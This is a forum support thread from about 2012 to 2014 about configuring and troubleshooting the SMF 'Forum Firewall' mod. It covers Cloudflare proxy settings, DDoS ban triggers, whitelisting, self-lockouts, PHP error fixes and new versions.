Post by: kanaka on November 19, 2012, 04:30:02 PM
in the box's country, the codes XX|YY indicate countries that would exclude from forum?
or what should I set to exclude visitors who come from countries that do not want in my forum?

Quote from: PLAYBOY on October 08, 2012, 06:12:16 AM
We should have an option to delete the logs anytime we want. I saw only one option to delete them and its in the scheduled tasks for the logs older than 7 days.

I installed the 1.1.16, how can I clear the log of visitors?
Title: Re: Forum Firewall
Post by: butchs on November 20, 2012, 07:07:22 AM
Quote from: kanaka on November 19, 2012, 04:30:02 PM
in the box's country, the codes XX|YY indicate countries that would exclude from forum?
or what should I set to exclude visitors who come from countries that do not want in my forum?

The mod only blocks countries.  Assuming you are properly configured.

Quote from: kanaka on November 19, 2012, 04:30:02 PM
Quote from: PLAYBOY on October 08, 2012, 06:12:16 AM
We should have an option to delete the logs anytime we want. I saw only one option to delete them and its in the scheduled tasks for the logs older than 7 days.

I installed the 1.1.16, how can I clear the log of visitors?

The log automatically purges every 7 days.  There is no current version that totally clears the DB.  But you can always do it manually.
:-X
Title: Re: Forum Firewall
Post by: kanaka on November 20, 2012, 09:19:06 AM
Thanks, great job!
Title: Re: Forum Firewall
Post by: huan on November 24, 2012, 03:50:53 AM
good work i have just installed these mod on my smf2.0

i try to work with cloudflare but the bypass protection was not working well it increase the attempt in the log for bypass attempted cant seem to be able to restore member ip ,i have tryed lot of way to get cloudflare work on my forum but still ip cant be reserve

on the log for reason invalid ip i cant see the ip or proxy used it stated as "keep alive"
Title: Re: Forum Firewall
Post by: butchs on November 25, 2012, 10:09:22 AM
The mod has built in help in multiple languages.  I am surprised so many people do not understand that SMF has built in help...  Not to be snotty but I put some effort in adding help text to the icons "?" to the mod to make it easier.  If you click on the help icons it will tell you how to configure "Visitor IP call to Proxy" and "Proxy Header ID" for Cloudfllare.

As per the help icons:
Visitor IP call to Proxy   HTTP_CF_CONNECTING_IP
Proxy Header ID:         Cf-Connecting-Ip

Possibly your issue is with setting up the bypass protection?  The tutor you seek is called "BYPASS PROTECTION HELP (http://www.simplemachines.org/community/index.php?topic=417490.msg3123695;topicseen#msg3123695)"

This mod requires some effort and time on your part to properly configure to protect your site.  Once done you will reap the benefits!  I suggest you search "This topic" for the BOLD help tutorials I created for detailed assistance.
:)
Title: Re: Forum Firewall
Post by: huan on November 25, 2012, 05:37:48 PM
the bypass protection help you shown is for admin ip confirmation ,i did not set it as i understand the risk of it

Visitor IP call to Proxy   HTTP_CF_CONNECTING_IP
Proxy Header ID:         Cf-Connecting-Ip

the above setting is default and i used it and nope cant change cloudflare ip back ,most cloudflare is still shown as bypass attempt ,i tryed to test using a proxy to browse the site and it shown as
"keep alive " or something strange name on the visitor log instead of showing the proxy ip i used

yes i have go thru all of the ? help icon on the mod

under
proxy information>ip address
should i whitelist the cloudflare ip here in order for the bypass protection to work to help reverse the cloudflare ip to the original visitor ip ?

Title: Re: Forum Firewall
Post by: butchs on November 25, 2012, 06:01:05 PM
Leave "Visitor IP call to Proxy   HTTP_CF_CONNECTING_IP" and "Proxy Header ID:         Cf-Connecting-Ip" alone and uncheck "Enable Bypass Protection" because you are not using it.  Unchecked the mod will still work with CF.  Just it will not catch the random bad guy who sneaks around it.

Today I added FAQ's to the 1st post.
Title: Re: Forum Firewall
Post by: Slack on November 26, 2012, 10:34:36 PM
QuoteThe mod will then try to read your robots.txt file and self configure.  Enable the test and say goodbye to the DDOS spoofers!

When you say the mod "self configures" - does that mean the server needs to be re-booted in order to do this?

Thanks.
Title: Re: Forum Firewall
Post by: stylusss on November 26, 2012, 11:18:24 PM
Anyone notice a significant change in "bad" traffic after installing?
Title: Re: Forum Firewall
Post by: winsoft on November 27, 2012, 06:01:29 AM
thats an awsome mod, thanks
Title: Re: Forum Firewall
Post by: butchs on November 27, 2012, 07:09:17 AM
Quote from: Slack on November 26, 2012, 10:34:36 PM
QuoteThe mod will then try to read your robots.txt file and self configure.  Enable the test and say goodbye to the DDOS spoofers!

When you say the mod "self configures" - does that mean the server needs to be re-booted in order to do this?

Thanks.

No.  Assuming you never had a robots.txt file installed when you loaded the mod you do the following:
To have the mod check you will uninstall the mod in Package Manager.  Then re-install the mod.  During the re-install the self configure script will look for your robots.txt file.  If found and is properly formatted, the once empty "Robots.txt action's" field will be populated.

Please note that when the mod is un-installed it disables it's self.  You will have to re-enable the mod for it to work.
Title: Re: Forum Firewall
Post by: Slack on November 27, 2012, 09:46:27 AM
Thanks butchs, appreciate the explanation.
Title: Re: Forum Firewall
Post by: butchs on November 27, 2012, 06:22:31 PM
you are welcome... To clarify the mod will NOT do anything if there is any text in the "Robots.txt action's" field during installation.  If there is any data in the "Robots.txt action's" field, you must delete all data and save the empty field before re-installing the mod.

Any changes made to the robots.txt file after mod installation will require manually editing the "Robots.txt action's" field.

The mod does it's best to guess your configuration.  I am sure there are some servers where the self configure will not work.  In those cases you will have to enter all the data manually.
:'(
Title: Re: Forum Firewall
Post by: huan on November 30, 2012, 10:46:05 AM
thank your mod helped me alot ,now start to like it and i managed to solve my cloudflare problem so combine it togther with cloudflare are equal to getting a $20 cloudflare plan for free :) ,one question on the ddos attack ban trigger beisde of whitelist ip seem most person is dynamic ip what is the recommend trigger #/sec today accident blocked one of my member maybe cos he keep refresh page to check pm that i sent to him so was blocked but lucky i notice it very soon and removed the ban trigger i used the default 0.65 cache duration20 so in my case what is recommended trigger timing
Title: Re: Forum Firewall
Post by: butchs on November 30, 2012, 06:30:08 PM
For some it is a PITA to set up this mod but if you follow the instructions it works.  Not recommended but for my site, I have been deleting the wasted SMF anti-hacking code that slows down the software.

I only whitelist regular members.  But there is a FAQ for whitelists.

I made the mod while using CF.  My goal was to get what it did not get when CF was in beta and the bots were still bugging me...  Now the mod does low level country blocks and an an attack ever other day.

Basically you need to set robots.txt Crawl-delay (I use 5) google webmaters (if they let you) and etc...  after they are all settled you can enable your ban trigger.  I use .7.

I don not ban anyone more than 1 hour with the mod.  Longer bans are done with htaccess.

Detailed info in the FAQ's on the first post.

Title: Re: Forum Firewall
Post by: huan on December 01, 2012, 12:57:08 PM
from what i read from the old post of these thread white can be done by permission usergroup so i whitelist forum firewall group for most important usergroup but still i see the user was banned for ddos it was fake response as he was replying to a few thread in short period of time and got auto banned so far these happen like once per one or two day
Title: Re: Forum Firewall
Post by: butchs on December 01, 2012, 08:48:05 PM
Was his member group white-listed (http://www.simplemachines.org/community/index.php?topic=417490.msg3092408;topicseen#msg3092408)?

The IP may have changed and the member was not logged in.  You can always adjust the trigger.
Title: Re: Forum Firewall
Post by: huan on December 02, 2012, 09:53:37 AM
yup he usergroup was whitelisted that post i already read i read most of post that contain "whitelist" on the post ,another question is can we whitelist a member so that them will not flag as hack attempt for sql injection character trigger

on side note how we whitelist by ip instead of usergroup seem out of a few thousand only less than 100hundred is important contributor

QuoteThe IP may have changed and the member was not logged in.  You can always adjust the trigger.
what you recommend currently is cache duration 20 trigger  0.65
Title: Re: Forum Firewall
Post by: butchs on December 02, 2012, 05:43:24 PM
The SMF system assumes the user is logged in.  The whitelist uses the SMF system plus I added the last used ip address(s).  If the member hits the site hard, keeps logging out, doesn't use cookies and his IP addresses changes daily there is not I or anyone can do.

Quote from: huan on December 02, 2012, 09:53:37 AM
another question is can we whitelist a member so that them will not flag as hack attempt for sql injection character trigger..

No, that is why I recommend running the mod for a few days in logging not banning mode.  Then you can delete the hack/ injections that are common for your site.

Quote from: huan on December 02, 2012, 09:53:37 AM
what you recommend currently is cache duration 20 trigger  0.65

Each site is different.  If you look a few posts up you see I use a trigger of .7.  You will have to adjust it based on the procedure.  There are a whole bunch of factors that contribute to the duration.  Server speed and forum content also play a factor.  I would try to slowly adjust up it so not to ban regular members while still in logging only.

Access you your phpMyAdmin last 100 visitors can assist if you look it after a bad bot hits you.  You can then see how fast they hit and adjust your duration to make their count fast.  Think of it this way.  A bot will hit the site faster than a human.  So if your members are getting blocked you need to make adjustments.
Title: Re: Forum Firewall
Post by: Howard43Willard on December 03, 2012, 03:01:36 AM
The above protection will not stop a determined attacker but it just may send them looking for easier targets.
(http://www.rlgf.info/16.jpg)
(http://www.rlgf.info/17.jpg)
(http://www.sbqg.info/19.jpg)
Title: Re: Forum Firewall
Post by: butchs on December 03, 2012, 07:03:38 AM
True.  Forum Firewall is written as a supplement to existing site protection methods and should not be the only line of protection.

Sending them elsewhere for easier targets is what it is about.
Title: Re: Forum Firewall
Post by: huan on December 30, 2012, 11:48:44 AM
2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter

getting alooot of these error under error log,is there a solution for these thank
Title: Re: Forum Firewall
Post by: waris on December 30, 2012, 01:54:38 PM
Hi,

Default Curve Theme.

I just installed the forum firewall MOD which went on smoothly without a hitch.
After the saving the settings the following appeared in the top bar under Forum Firewall.

QuoteSECURITY RISK: MAGIC_QUOTES ARE ON!

What do I have to uncheck to remove the above security risk?

Title: Re: Forum Firewall
Post by: butchs on December 30, 2012, 06:06:22 PM
Quote from: huan on December 30, 2012, 11:48:44 AM
2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter

getting alooot of these error under error log,is there a solution for these thank

Will look into it and I did.  There are two "||" in a list.  Search the lists for "||" and replace with "|".
Title: Re: Forum Firewall
Post by: butchs on December 30, 2012, 06:07:46 PM
Quote from: waris on December 30, 2012, 01:54:38 PM
Hi,

Default Curve Theme.
I just installed the forum firewall MOD which went on smoothly without a hitch.
After the saving the settings the following appeared in the top bar under Forum Firewall.
QuoteSECURITY RISK: MAGIC_QUOTES ARE ON!
What do I have to uncheck to remove the above security risk?

Search this thread (http://www.simplemachines.org/community/index.php?topic=417490.msg3201427#msg3201427).  Your host is the only one than can adjust the settings.
Title: Re: Forum Firewall
Post by: huan on December 31, 2012, 12:05:51 AM
Quoteif (($forumfirewall_edited <= edited) || ($forumfirewall_edited > edited) {
if((!forumfirewall_checkdns($forumfirewall_ip, $modSettings['forumfirewall_domain'])) ||
   if ((empty($modSettings['aeva_enable'])) || (!$modSettings['aeva_enable']) || (($modSettings['aeva_enable'])
if (($forumfirewall_ip == '') || (empty($forumfirewall_ip))) {
if (($forumfirewall_ip == '') || (empty($forumfirewall_ip)))
if (!isset($modSettings['forumfirewall_enable']) || !$modSettings['forumfirewall_enable']) return;


the error is from
2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter
Apply Filter: Only show the errors from this file
File: /home//Sources/ForumFirewall.php
so i searched These is the || that i found on Sources/ForumFirewall.php which one should i replace with |
Title: Re: Forum Firewall
Post by: butchs on December 31, 2012, 07:20:09 AM
No no no...   :o  Wrong spot to search...  Do not search the source code for "||"!

Go the "Forum Firewall Admin" page in SMF and search the text in the "Robots to be tested", "Robots.txt action's", "Injection List", "XSS Events" and etc input strings.

Data entered must be in the in the format of "XX|YY" where XX and YY are the Entity.  Having "||" or a single "|" in the beginning or end is  the reason for empty delimiter since there is nothing between the "||".  SEE ATTACHED.
Title: Re: Forum Firewall
Post by: huan on January 01, 2013, 01:13:13 AM
Empty Delimiter error fixed

thank i notice that i have ended the line with |  and remove that and now it worked
Title: Re: Forum Firewall
Post by: Greenest on January 10, 2013, 02:16:12 AM
If I want to install Enable admin IP confirmation what should I write at
Admin IP low
Admin IP hight
Admi Domain name
Title: Re: Forum Firewall
Post by: butchs on January 10, 2013, 06:58:53 AM
Read "BYPASS PROTECTION HELP" in the 1st post in this thread under "Frequently Asked Questions (FAQs)".
Title: Re: Forum Firewall
Post by: butchs on January 19, 2013, 04:42:17 PM
After over a year of trying to figure out how to do it I succeeded in making the next generation challenge page.  Sorry it is only available for SMF 2.0X and is used to challenge IP addresses that fail.  ie mobile users.  The list of security features and checks to the challenge include all those recommended by OWASP, others and my own tricks.

I was not able to find the portuguese translator so bear with my lousy portuguese translation.

Changes as follows:
Title: Re: Forum Firewall
Post by: pedropais on February 01, 2013, 01:59:37 PM
Hi.

Thanks for making this mod available. It's been very useful, but ever since I installed/enabled it, my Apache gets filled with the errors following:
[Fri Feb 01 15:50:08 2013] [notice] child pid 14130 exit signal Bus error (7)
[Fri Feb 01 17:10:49 2013] [notice] child pid 16329 exit signal Bus error (7)
[Fri Feb 01 18:47:41 2013] [notice] child pid 18495 exit signal Bus error (7)


Is there something I can do about that?

Regards
Title: Re: Forum Firewall
Post by: butchs on February 01, 2013, 08:09:54 PM
Could just be bad timing...  The only part of the mod that may use Apache is the country id and the mod checks to see that "apache_note" exists.    Php mods rarely cause that type of error.  Seems to be a PHP or Apache issue with the host.

Try stopping and restarting Apache.  Next try upgrading php and or Apache.  Or ask your host to.  Third see if geoIP is fully enabled...  But do not mention the mod.  An overseller may point fingers just to do nothing.
Title: Re: Forum Firewall
Post by: glennmckenna on April 14, 2013, 06:33:42 AM
has any one tested this on smf 2.0.4 may i ask ?
Title: Re: Forum Firewall
Post by: butchs on April 14, 2013, 09:33:21 AM
I am using it on 2.0.4.
Title: Re: Forum Firewall
Post by: MangosMadMax on May 15, 2013, 09:21:06 AM
Quote from: glennmckenna on April 14, 2013, 06:33:42 AM
has any one tested this on smf 2.0.4 may i ask ?

I'm running it on here - http://www.mangosbackupforum.com/
Title: Re: Forum Firewall
Post by: Adrek on June 03, 2013, 11:49:04 AM
Can I ban IP addresses from China with this mod? I have lately issue with DDoS attack from China (in April server used 10GB transfer, in May - 250GB...)
Title: Re: Forum Firewall
Post by: Kindred on June 03, 2013, 12:14:06 PM
you should stop those at the server level (using your host's ban utility or .htaccess)
Title: Re: Forum Firewall
Post by: frankfenderbender on June 24, 2013, 11:35:25 AM
I'm using the following on SMF 2.0.4
   ForumFirewall 1.1.5
   botsvsbrowsers_1.1
   Bad_Behavior_1.5.6
   StopSpammer_v2_3_9

I changed my server port list in the firewall from "80" to "80|443|3306" (as the "?" note shows in its example, and now I cannot access the page as the admin (or anyone else) at all, even after having a backup of 5 days previous restoration of the [domain]/forum directory completely replaced.
I get the following error:

   HTTP Error 403 Forbidden
   You don't have permission to access
   /forum/ on this server.
   Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Bypass attempt!
   If you get this message in error, please contact the ADM1N and provide the date and time of this message.

I manually tweaked the MySQL setting in smf_settings for forumfirewall_enable from 1 to 0.
Now I get the following error:

   Connection Problems
   Sorry, SMF was unable to connect to the database.
   This may be caused by the server being busy.
   Please try again later.

Better, but where can I undo my change made to the ports list?
I need to do this so that I do not start letting in the likes of the 700 bypass attempts that tried to get in last week alone.

Thanks,
Chris
[email protected]
[email protected]
Title: Re: Forum Firewall
Post by: Kindred on June 24, 2013, 12:16:57 PM
you can not connect to the database, because, when you tweaked settings.php, you messed up the connection info (what did you use to edit settings.php?)

The reason a restore of files did not fix anything is because the firewall settings are stored in the database...
Title: Re: Forum Firewall
Post by: hustreamload on November 03, 2013, 01:52:32 AM
Hello,
as I see I'm not the first who marked  the Block Violations after the install process, and then was banned from his own forum...ok, its already done. I reupped the last upgrade, so the modifications disappeared, i could login again. I wanted to uncheck the box "Block violations" (as I've read this topic here), reupped the firewall,  but the smf "remembers", and when I activate the firewall, I am banned again.
Where can I set in SMF DB this Block Violations?
Thnx
HuStreamload
Title: Re: Forum Firewall
Post by: Kindred on November 03, 2013, 07:12:29 AM
ummmm..... did you try reading the first post, which has a series of FAQ links?


specifically, the first linkin the list: BLOCKED MYSELF....    linking to http://www.simplemachines.org/community/index.php?topic=417490.msg3139830#msg3139830
Title: Re: Forum Firewall
Post by: hustreamload on November 03, 2013, 09:23:43 AM
Hello Kindred, its another solution on the problem, if you are banned, how to login as admin again (I made it with reup the SMF, this FAQ recommends it through phpmyadmin). I checked in phpmyadmin, there is only one value to change, and it is 0, as recommended. And the firewall is switced off in that case. Bur I can manage this "Block Violations" value only through the installed firewall, and when I install it again, the login problem is returning (as I set it after the 1st installation of the firewall).
The question : how to set it through the file system or phpmyadmin?
Title: Re: Forum Firewall
Post by: Kindred on November 03, 2013, 11:10:47 AM
you don't need to UNINSTALL the mod... 

Disable it (per the instructions) but leave it installed.

Then change the settings to allow yourself through
http://www.simplemachines.org/community/index.php?topic=417490.msg3092408;topicseen#msg3092408

then re-enable it...
Title: Re: Forum Firewall
Post by: butchs on November 03, 2013, 11:28:33 AM
Besides white-listing all your members.  You should look at the forum firewall log for the reason you banned yourself.  Then review all the mods settings and make adjustments.  Click on the help "?" for instructions.
Title: Re: Forum Firewall
Post by: hustreamload on November 03, 2013, 11:36:33 AM
Thnx guys, the last: where to set the whitelisting. I understand how to make safe member's group, but then? Try it myself, of course, but if u are here :-)
Title: Re: Forum Firewall
Post by: JourdanDixon on December 08, 2013, 12:30:04 AM
I'm on SMF 2.06 and I installed this mod, but when I try to save the page after enabling I get the error "This webpage is not available".  I get slightly different messages by browser.  This is the url ending it's trying to send to:

/forum/index.php?action=admin;area=forumfirewall;save;sa=settings

Any ideas?
Title: Re: Forum Firewall
Post by: butchs on December 08, 2013, 09:52:49 AM
Do not know.  I use it on 2.06 with no issues.

It could be an issue with your hosts firewall?  They could be blocking one of the tests.

Un-check "Block violations" and check "Logging".  Monitor the log for a few weeks while adjusting the settings based on your log for your forum before you check "Block violations".
Title: Re: Forum Firewall
Post by: Zavoolon on December 10, 2013, 03:42:18 PM
I got this error message when I swiched on Firewall manualy in database by phpmyadmin - SECURITY RISK: ENSURE ALLOW_URL_FOPEN AND ALLOW_URL_INCLUDE ARE BOTH DISABLED TO PROTECT AGAINST RFI! Should I switch of this options in my htaccess file?
Title: Re: Forum Firewall
Post by: butchs on December 10, 2013, 07:01:44 PM
If you can do it.  Most hosts force to you ask them to do it for you.
8)
Title: Re: Forum Firewall
Post by: Zavoolon on December 11, 2013, 02:28:45 AM
But what it gives? Do i need to switch off both of them? May it be the error because of wich I couldn't activate this mode in my Admin section?
Title: Re: Forum Firewall
Post by: butchs on December 11, 2013, 08:36:47 PM
Yes both.  RFI = remote file inclusion (https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_Remote_File_Inclusion) vulnerabilities. 
:'(
Title: Re: Forum Firewall
Post by: MDARULZ on December 12, 2013, 02:27:09 PM
Hello butchs - thanks for your fantastic mod, and for feedback in this topic !

I am using SMF version 2.06 and FF version 1.1.6.

Perhaps you can speculate on an error (see the bottom of this post) that's new on my forums (and, I have done no updates or mods, or removed mods, to cause it).  I realized just before writing this that one change that happened at almost the same time was a MySQL update by my web host (from 5.1.70 to version 5.5.32, according to a notice from them), along with a PHP update (5.3.27 to version 5.4.22).  Apache was also updated (2.2.25 to version 2.4.6), but I doubt that is the issue, based on my limited knowledge of forum software.

I'm pretty sure that one of the updates is causing the error.  Do you have any suggestions for correcting this error ?  Thanks in advance.




.../forums/index.php?action=pm;sa=send2
8: Array to string conversion
File: .../forums/Sources/ForumFirewall.php
Line: 367

Line 367 is:  $enity_content = $h.': '.$v;




BTW, why use the word 'enity' instead of 'entity' ??
Title: Re: Forum Firewall
Post by: butchs on December 12, 2013, 08:42:54 PM
My guess that an array is not being used where it should be used.  Most likely a bot.  Your host is using a new php.  Things change all the time.  I will need to look into it.  Good timing, planing to work on updates in the next few weeks.

I wonder if a Visitor is getting blocked around the same time.  If so I will like to see that portion of the log.
Title: Re: Forum Firewall
Post by: blogger419 on January 01, 2014, 05:55:33 PM
I just installed this mod. However, when I attempt to save settings I get an error that says "The Connection Was Reset". I am not using a proxy and it happens in Firefox, and Chrome. Is there a setting that I need to check in the firewall itself? Thank You.
Title: Re: Forum Firewall
Post by: butchs on January 01, 2014, 07:27:29 PM
I covered this topic before in this thread.  That message is purely host related.  It is not generated by the mod.  Chances are you host is either having issues or has a firewall that is blocking you.

You can try:
1.  See if your host connection is good.
2. Have the host adjust their server firewall.
3.  Edit the mod settings via Cpanel through the mySql database.

Title: Re: Forum Firewall
Post by: Uhura! on January 09, 2014, 08:14:57 AM
Hello butchs,

I can see that this is an excellent mod.

I have to admit - some of the technical things about it are above my level of comprehension.

Can you help me?

1) please give me a really simple overview ... and
2) please tell me how to adjust my settings so that real visitors are not accidentally blocked? )I currently have everything set to default and I am afraid to make any changes because I do not understand how it works or what to try.)

Yesterday one of my head admins was blocked for an entire day & that told me I really need to learn more about this. I suspect that other real visitors may also be being blocked.

Thank you for your help butchs!
Title: Re: Forum Firewall
Post by: butchs on January 09, 2014, 08:10:59 PM
Hi.  Please read at the very first post in this thread.  Then let me know if you have more questions.
Title: Re: Forum Firewall
Post by: Uhura! on January 12, 2014, 08:12:25 PM
Honestly - yes. I read the first post. Twice. I will read again.

My issue is that there are some things being described which I do not comprehend.

I understand so far that I need to uncheck "Block violations" until I am able to see that there are "no infractions in the visitor logs that can deny you or your top members access."

I have unchecked this because one of my top members keeps getting banned and I am understanding that unchecking "Block Violations" means that no one will be blocked from the site? Am I correct?

My next question is - What will I be looking for in the visitor logs?

Thank you!
Title: Re: Forum Firewall
Post by: butchs on January 12, 2014, 09:10:07 PM
Yes.


Assuming you whitelist your regular members per the first page.  You will bee looking blocks caused by your forum.
Title: Re: Forum Firewall
Post by: Uhura! on January 12, 2014, 09:19:15 PM
If I whitelist regular members from the permissions area, and I check Block violations - will my regular members be exempt from being blocked?
Title: Re: Forum Firewall
Post by: butchs on January 12, 2014, 09:37:53 PM
Yes long as they did not log out and have an ip change since the last time they were on your site.  You should do it before enabling blocking.
Title: Re: Forum Firewall
Post by: zmijek on March 24, 2014, 09:44:37 AM
Hello,

I have some problem with my Firewall sending mi informations:
HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)  - Hack: Disallowed characters!

How I can resolved this errors???

Thank you.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2014, 09:21:47 PM
How do you know they are ERRORS?  Is the bot really GOOGLE?  It is easy to spoof an ip these days...

If you want to give access you can do two things:
1.  Whitelist Google in "User-Agent Whitelist".
2.  Edit "Permitted URI Characters".
3.  Set up robots.tst inspection.

See the first post in this thread for more information.
Title: Re: Forum Firewall
Post by: marjorie on April 28, 2014, 10:12:55 AM
Something weird here... package manager refuses to upload zip and when I follow the manual unpack and upload it cannot see the mod files.

And yet Ive just upload another security mod (loginsecurity) with no problems at all.

I'm running SMF2.07

Help please!
Title: Re: Forum Firewall
Post by: butchs on April 30, 2014, 11:35:23 AM
I doubt that I can be of much help with this issue.  This mod is much bigger than loginsecurity.  As far as manual unpacking, that sounds like a SMF questions not a mod question.  This mod installs just fine through package manager.  Maybe you are having a connection timeout issue?
Title: Re: Forum Firewall
Post by: butchs on May 23, 2014, 09:25:08 PM
Version 2.0.0 with IPv6 support is in beta testing.  Hopefully all is well and should should be totally debugged in a week...

SMF Helper -  FF 2.0.0 Beta Link (http://www.smfhelper.com/community/index.php/topic,5930.0.html)
Title: Re: Forum Firewall
Post by: butchs on May 28, 2014, 09:13:08 PM
The next release will support SMF 2.1 too.  Hopefully, four more days of testing and it will be done....
Title: Re: Forum Firewall
Post by: Bigguy on May 28, 2014, 11:23:58 PM
Will be installing this with the next upgrade from github. Nice job bud. :)
Title: Re: Forum Firewall
Post by: butchs on May 29, 2014, 08:21:21 AM
It appears you are the 2.1 test bed.  Thank you since, I do not plan to go live with 2.1 until later.  My experience with SMF 2.0 beta was annoying.

I downloaded "SMF 2.1 Alpha 1" over the weekend and used that as the basis.  For other versions I would suggest you use package manager emulate.  All in all I hope you try it sooner than later, I would like to see SMF 2.1 with at least two days live with no errors in the log before FF is released.
Title: Re: Forum Firewall
Post by: Bigguy on May 29, 2014, 08:49:17 AM
Ok, I will upgrade my site when I get home from work and install it later tonight if I can if not it will be tomorrow for sure.
Title: Re: Forum Firewall
Post by: Kindred on May 29, 2014, 09:16:14 AM
I also have 2.1 running on a test site... :)
I'm even willing to give you access to play around, butchs
Title: Re: Forum Firewall
Post by: butchs on May 29, 2014, 09:34:59 AM
Kindred,
I like to take you up on that.  It will be sweet to test it live.  Plus a have a few days left to do some anti-hacking stuff until I have to go back to the drudgery of trying to make money.
:)
Title: Re: Forum Firewall
Post by: sinnerman on June 11, 2014, 04:12:04 AM
Hi guys,

I'm trying to install this mod on a dedicated server with SMF 2.0.7. When i browse the mods and find it, it says the package is empty and i should upload the files myself.

When i upload the files myself and try to install i get:
Error in Package Installation
At least one error was encountered during a test installation of this package. It is strongly recommended that you do not continue with installation unless you know what you are doing, and have made a backup very recently. This error may be caused by a conflict between the package you're trying to install and another package you have already installed, an error in the package, a package which requires another package that you don't have installed yet, or a package designed for another version of SMF.

and in particular:
31.   Execute Modification   ForumFirewall.xml   Modification parse error
32.   Execute Modification   ForumFirewall.xml   Modification parse error
33.   Execute Modification   modification_language.xml   Modification parse error
34.   Execute Modification   modification_language.xml   Modification parse error
35.   Execute Modification   modification_language_2x.xml   Modification parse error
36.   Execute Modification   modification_language_2x.xml   Modification parse error

any ideas?

EDIT: just a simple chmod solved the issue. Sorry. :)
Title: Re: Forum Firewall
Post by: butchs on June 15, 2014, 08:58:29 AM
Version 2.0.0 is official and released.  This is a total rewrite of the mod with lots of improvements.   :o

Some notes:

Only the test conditions were updated for SMF 1.1.x.   No new features.
Title: Re: Forum Firewall
Post by: LeYoyo on July 07, 2014, 06:37:11 PM
Hi Butchs,

I installed the Forum Firewall mod, but since it's done, I have many errors in the logs, most of them are :


8: Undefined variable: ff_proxy_error
File: /myhomepages/forum/Sources/Subs-ForumFirewall.php
Line: 178

Any idea ?

Thanks in advance for the help
Title: Re: Forum Firewall
Post by: butchs on July 08, 2014, 08:20:10 PM
I was so busy testing FF with a proxy I missed the case when a proxy was not being used.  I believe the attached will solve the problem.  Try replacing the attached in your "/myhomepages/forum/Sources/" directory and resetting the forum cache (if you can).

Please let me know if it works after a few days.
Title: Re: Forum Firewall
Post by: LeYoyo on July 09, 2014, 12:43:01 AM
Thx for that.
Installed, I will give you a feedback
Title: Re: Forum Firewall
Post by: LeYoyo on July 10, 2014, 02:59:48 AM
Seems to work, but I have another one now :

8: Undefined variable: time_diff
Fichier: /myhomepages/forum/Sources/ForumFirewall.php
Line: 237
Title: Re: Forum Firewall
Post by: butchs on July 10, 2014, 08:01:35 AM
Interesting.  I am surprised my server did not throw that one.  Try the attached in the same folder.
Title: Re: Forum Firewall
Post by: LeYoyo on July 10, 2014, 10:20:37 AM
I will install it and give you a feedback.
Thanks :)
Title: Re: Forum Firewall
Post by: LeYoyo on July 11, 2014, 12:27:38 PM
Works fine.

Thanks butchs ;)
Title: Re: Forum Firewall
Post by: butchs on July 11, 2014, 04:20:34 PM
Thank you.  In a week or so I will release the changes in the mod.  Until then, I will wait to see if someone else reports something else I missed.

;)
Title: Re: Forum Firewall
Post by: butchs on July 23, 2014, 08:32:50 PM
New version with some bug fixes for SMF 2.0.x.  I included LeYoyo's bugs and made a security change to the trusted proxies.

I am going to reiterate that the mod does its best to find the visitors IP address but if your forum is not behind a proxy the likelihood of the address it finds is the actual IP decreases.
:-X
Title: Re: Forum Firewall
Post by: ArsenArsen on August 14, 2014, 05:39:50 PM
ff_proxy_error is undefined,

Thanks
Title: Re: Forum Firewall
Post by: butchs on August 14, 2014, 07:50:24 PM
I believe that should have been fixed with 2.0.1.  Did you update to the latest version and refresh your forum cache (or wait a few days)?
Title: Re: Forum Firewall
Post by: chris @ Alpine on August 24, 2014, 01:55:58 AM
Hello,

I am sorry to ask a probably already answered question. It's just not clear to me how I can change these options.  Where are these variables located?  What file?

ALLOW_URL_FOPEN
ALLOW_URL_INCLUDE

"SECURITY RISK: ENSURE ALLOW_URL_FOPEN AND ALLOW_URL_INCLUDE ARE BOTH DISABLED TO PROTECT AGAINST RFI!"

And I guess DISABLED means both variables should = 0?

Thank you.
Title: Re: Forum Firewall
Post by: butchs on August 24, 2014, 09:20:11 AM
Yes, in most cases you will need to ask your hose to adjust.
Title: Re: Forum Firewall
Post by: chris @ Alpine on August 24, 2014, 02:25:19 PM
Thanks. I employ a typical shared web-hosting service. Do you mean the hosting company has to do this?  Or would that in my cPanel?
Title: Re: Forum Firewall
Post by: lc62003 on August 24, 2014, 02:41:12 PM
Trying this on 3 sites.  Great mod!!  There are a couple of questions that pop up.

First, all three sites get the same message in the error logs:

8: Undefined index: cols
Apply Filter: Only show the errors from this file
File: ./public_html/Themes/default/Admin.template.php
Line: 910

Can you recommend a fix?


Second, messing around I've discovered (as mentioned earlier in this thread) the bypass check does not play well with mobile devices.  This is important since better than 75% of the users are on mobiles.  Simple enough right?  Just turn it off and they won't be logged/blocked.  Unchecking the box and saving = unchecked box, but still getting logged.  Uninstall/reinstall will make it cease but that's the only way.  Same on all three sites.  Further investigation suggests this is true for other checks as well, including robots, user agent, and maybe others.  Any words of wisdom?

Thanks again!   8)
Title: Re: Forum Firewall
Post by: butchs on August 24, 2014, 05:35:32 PM
Quote from: lc62003 on August 24, 2014, 02:41:12 PM
First, all three sites get the same message in the error logs:

8: Undefined index: cols
Apply Filter: Only show the errors from this file
File: ./public_html/Themes/default/Admin.template.php
Line: 910

Can you recommend a fix?

No, as far as I can tell that has nothing to do with my mod.  I do not edit the admin template file.  I use my own template.
O:)

Quote from: lc62003 on August 24, 2014, 02:41:12 PMSecond, messing around I've discovered (as mentioned earlier in this thread) the bypass check does not play well with mobile devices.

You must be running an old version of this mod.  The issue with not recognizing some mobile device IP addresses was fixed with version 2.0.x of this mod.  The bypass check was totally re-written and all bugs were fixed with version 2.0.x of this mod.  If a mobile user faces the challenge, they have the option to enter their user name and password in the SMF login dialog (this will be added to SMF 2.1 too when it gets closer to release).  So please upgrade your FF mod. 
  :o
Please refresh your forum/ proxy/ server cache after making changes.  For more information see previous posts in this thread (start with the first one).
8)
Title: Re: Forum Firewall
Post by: lc62003 on August 24, 2014, 08:38:28 PM
Quote from: butchs on August 24, 2014, 05:35:32 PM


No, as far as I can tell that has nothing to do with my mod.  I do not edit the admin template file.  I use my own template.
O:)


